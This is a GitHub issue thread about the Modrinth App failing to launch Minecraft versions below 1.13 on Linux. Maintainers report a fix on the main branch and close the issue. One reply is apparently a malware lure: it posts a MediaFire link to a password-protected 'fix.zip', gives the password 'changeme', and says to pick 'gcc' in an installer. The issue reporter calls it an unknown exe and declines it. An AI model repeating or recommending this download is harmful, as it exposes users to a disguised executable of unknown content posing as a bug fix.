### ISSUE TITLE
Minecraft below 1.13 doesn't start

### ISSUE THREAD

**Issue by iLtanaka** [modrinth/code#2301] opened 2024-08-26 06:01 UTC
### Please confirm the following.

- [X] I checked the [existing issues](https://github.com/modrinth/code/issues) for duplicate problems
- [X] I have tried resolving the issue using the [support portal](https://support.modrinth.com)
- [X] I have ensured my Modrinth App installation is up to date

### What version of the Modrinth App are you using?

0.8.2

### What operating systems are you seeing the problem on?

Linux

### Describe the bug

Minecraft below version 1.13 won't start because of a problem with lwgl. I tried to run minecraft on wayland and xorg (xrandr installed), but it doesn't work. But LegacyLauncher can run any version of minecraft on my system.
All I found on the modrinth github are open issues. The lwgl3 mod option is unnecessary since it's fabric only mod.

### Steps to reproduce

1. Just start minecraft

### Additional context

Latest logs:
[legacylauncher.log](https://github.com/user-attachments/files/16744514/legacylauncher.log)
[modrinth.log](https://github.com/user-attachments/files/16744526/modrinth.log)
[journalctl-log(legacylauncher).log](https://github.com/user-attachments/files/16744611/journalctl-log.legacylauncher.log)

System: arch linux
GPU: RX6600XT
DE:gnome(wayland)

**Comment by QAQ330** [comment] 2024-08-26 06:38
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iLtanaka** [comment] 2024-08-26 06:42
Exe file? Really? Its linux system, and I don't want to run unknown files on my PC

**Comment by Norbiros** [comment] 2024-08-26 09:17
The issue is fixed on the main branch. Please wait for the next release. If the problem persists, try repairing your instance.

**Comment by evhan3584** [comment] 2024-09-03 23:52
Still getting this error on 0.8.5, what commits fixed this issue?

**Comment by Geometrically** [comment] 2024-09-07 02:46
Closing as fixed

**Closed by Geometrically** 2024-09-07 02:46 UTC
Labels: app
